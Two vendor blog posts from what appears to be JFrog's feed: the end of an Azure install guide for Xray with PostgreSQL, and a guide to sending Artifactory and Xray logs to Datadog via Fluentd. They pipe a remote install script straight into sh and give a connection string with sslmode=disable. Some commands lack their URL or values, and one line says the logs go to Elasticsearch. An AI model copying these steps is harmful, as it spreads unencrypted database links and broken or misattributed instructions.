To accomplish this, you will need to create an Azure PostgreSQL service before installing Xray. You can then install Xray to use this existing database.

We’ve created a helpful ARM template for you that will deploy an Azure PostgreSQL service with the ideal settings for use with Xray. You can find this template in our JFrog-Cloud-Installers repo, or you can pick one from the official Azure repository.

You can clone the JFrog repo to your own workstation:

$ git clone https://github.com/jfrog/JFrog-Cloud-Installers.git
$ cd ~/JFrog-Cloud-Installers/AzureResourceManager/Postgresql

Edit the postgres.parameters.json file and set the values of db_user, db_password, and db_server.

The file azurePostgresDBDeploy.json is the ARM template, which contains the preferred settings. The skuSizeMB parameter sets the database storage to 200 Gb, which is the recommended size for Xray.

Using the Azure CLI, deploy the PostgreSQL service to the same resource group used for Artifactory deployment. 

$ az deployment group create --resource-group  --template-file azurePostgresDBDeploy.json --parameters @postgres.parameters.json

After deployment is done, you will see PostgreSQL service in your resource group: 

This server is now available to use with Xray.

BYOL Install on Azure Cloud

Once you’re prepared with these essentials, you can start the install from Azure Marketplace.

  1. Go to Microsoft Azure Marketplace.
  2. Search for “JFrog” or “Xray”
  3. Select JFrog Xray ARM Template

JFrog Xray ARM Template

Or you can navigate directly to JFrog Xray ARM Template.

To start the install procedure: 

  1. Click on the GET IT NOW button.
    If you are not signed in, Marketplace will ask you for your Azure account credentials.
  2. In the resulting popup, click Continue to agree to Microsoft terms.
  3. Click Create

The procedure will now take you through a series of tabs to enter information.

Basics

Here you will select the active subscription for this instance, as well as its region, which must be the same as the Artifactory deployment.

You must also select an Azure Resource Group for the instance. You may not select the same resource group where Artifactory was deployed. With that exception, you can either choose one that has already been created through the Azure Resource Manager, or click Create new to define one now.

VM Credential

In this tab you must specify a set of login credentials for the VM that will be created for JFrog Xray to run in. Enter a username of the valid form for the VM administrator, and you may define either a 12-character password or an SSH public key.

The Xray instance should be in the same virtual network as the Artifactory instance. Select the virtual network from the resource group where you‘ve deployed Artifactory, and select any available subnet in that VN. The recommended VM size is Standard D4s v3, and the minimum requirement is 4 vCPUs. 

Xray Settings

Select the Xray version, set the cluster name and generate the master key. 

Your Artifactory join key can be found in the Administration module of Artifactory. In the Security > Settings tab, enter your password in Connection details to unlock the platform connection details. You can then view and copy the join key to paste into the ARM template form. Provide the URL to your Artifactory deployment.

Database Configuration

On this screen you can create or connect Xray to a database. If, as recommended, you have created an PostregSQL service on another node, select Use existing postgresql instance. Then  enter the database server name and the connection string as well as username and password from your PostgreSQL instance.

Connection string example:

postgres://<db_server_name>.postgres.database.azure.com:5432/<db_name>?sslmode=disable


Review + Create

In this final tab, Azure will verify your configuration. When validation is passed, click Create to start the deployment. 

After Deployment

The hard work is done! The ARM template takes over from here, deploying Xray and its component parts into the Azure VM, and joining it with Artifactory.

When the deployment is complete, login to your Artifactory instance. You will see the Index Resources popup, which confirms Xray is up and running. From here, you can select which repositories you want Xray to index.

Once you set up your Xray watches, you can enjoy the rich taste of DevSecOps, secure that you’ll be alerted when a critical component has an issue, and that unsafe builds can be blocked from release.

For a full demo of the Artifactory, PostgreSQL, and Xray installation process, watch this tutorial video.

]]>
Track JFrog Platform Performance with Datadog Analytics https://jfrog.com/blog/track-jfrog-platform-performance-with-datadog-analytics/ Mon, 20 Jul 2020 14:44:07 +0000 https://jfrog.com/?p=60980

Faithful operation of your JFrog Platform can be best assured by tracking usage data of Artifactory and Xray. With insights gained through real-time observability and log analytics, you can boost the efficiency of your DevOps pipeline and keep your software releases running joyfully.

Datadog is a SaaS-based data analytics platform that is a popularly used monitoring service for cloud-scale applications.  It’s a data analysis platform that can be readily enabled for JFrog Platform monitoring through our integrations.

Let’s take a look at the two-step process to install the data collector integration and use DataDog to monitor the operation of your JFrog Platform.

Using Fluentd

To start, we’ve made available a JFrog log analytics integration with the open-source data collector Fluentd that can be installed with each product instance of the JFrog Platform Deployment. Fluentd performs the log input, field extraction, and record transformation for each product in the JFrog Platform, normalizing the output of this data to JSON.

With all log data available in this common format, Fluentd will deliver it through Fluentd’s pluggable architecture to your Datadog dashboard.

Installing FluentD

You must install a Fluentd logging agent in each node of your JFrog Platform Deployment (JPD). This agent will tail the various JPD log files for new entries, apply any corresponding record transformations and then send to the relevant output plugin for Fluentd.

To install the Fluentd agent in each node, perform the procedure for the node’s OS type as shown in the Fluentd installation guide.

For example, for nodes operating Red Hat UBI Linux, the Fluentd agent td-agent must be installed. For root-based package managers (root access is required):

$ curl -L https://toolbelt.treasuredata.com/sh/install-redhat-td-agent3.sh | sh


Or, for user-space installations on Red Hat UBI, to
install the Fluentd Ruby and Gem:

$ curl -O  | tar -xvf

Configuring FluentD

Depending upon if we just completed a root based or non-root based installation the Fluentd configuration file may need to be placed in different locations.

By default for package manager root installations the td-agent.conf file is located in /etc/td-agent/

$ ls -al /etc/td-agent/td-agent.conf 
-rw-r--r-- 1 root root 8017 May 11 18:09 /etc/td-agent/td-agent.conf


For non-root based installations we can store the td-agent.conf file anywhere we have write permissions. When we run the td-agent, we can use the -c flag to point Fluentd to this file location.

The configuration file must be replaced with a configuration file derived from the JFrog log analytics Github repo.

In this repo, the elastic folder contains configuration file templates. Use the template that matches the JFrog application running in the node.

  • Artifactory 7.x
  • Xray 3.x
  • Artifactory 6.x

We will need to update this configuration file with a match directive that specifies the host and port that points to our Datadog instance.

#DATADOG OUTPUT

  @type Datadog
  @id Datadog_agent_Artifactory
  api_key 
  # optional
  include_tag_key true
  dd_source Fluentd

#END DATADOG OUTPUT

Running Fluentd

Now that we have the new configuration file in place we can start td-agent as a service on the pod after logging into the container:

$ systemctl start td-agent


For non-root installs, we can run the td-agent against the configuration file directly:

$ td-agent -c td-agent.conf

 

This will start the Fluentd logging agent which will tail the JPD logs and send them all over to Elasticsearch.

You must repeat these procedures for all Kubernetes pods running Artifactory and Xray.

Using Datadog

Datadog can be set up by creating an account and going through onboarding steps or by using apiKey if one already exists. If it is a new Datadog setup, do the following:

  • Run the Datadog agent in your Kubernetes cluster by deploying it with a Helm chart
  • To enable log collection, update Datadog-values.yaml given in the onboarding steps
  • Once the agent starts reporting, you’ll get an apiKey which we’ll be using to send formatted logs through Fluentd
  • Install Fluentd integration by going to Integrations, search for Fluentd and install it

Once the Datadog is set up, we can access logs through Logs > Search. We can also select the specific source that we want logs from.

If an apiKey exists, use the Datadog Fluentd plugin to forward logs directly from Fluentd to your Datadog account. Follow the Fluentd plugin configuration instructions for Artifactory to set up your integration. Adding proper metadata is the key to unlocking the full potential of your logs in Datadog. By default, the hostname and timestamp fields should be remapped so we don’t specify them.

Add all attributes as Facets from Facets > Add on the left side of the screen in Logs > Search

Now create a new dashboard from Dashboards > New Dashboard > New screenboard

Import the dashboard from export.json and replace the existing new dashboard with it. You can now access the dashboard which contains information displayed through our data widgets to give real time observability into JFrog Unified Platform.

Once installed, The JFrog Platform Logs dashboard presents timeline and count data for key operating metrics:

  • Log volumes, which can be filtered by type
  • Service errors
  • HTTP response codes
  • Accessed image
  • Accessed repositories
  • Data transfers in GB for uploads/downloads
  • Top 10 IPs for upload/download
  • Audit actions by username
  • Denied actions and logins by IP and username
  • Accepted deploys by username

A Fetching Solution

Now you have a robust tracking solution using Datadog, and are empowered to monitor your JFrog Platform Deployment across all of its services and executing nodes, gaining valuable data insights into its operation.

]]>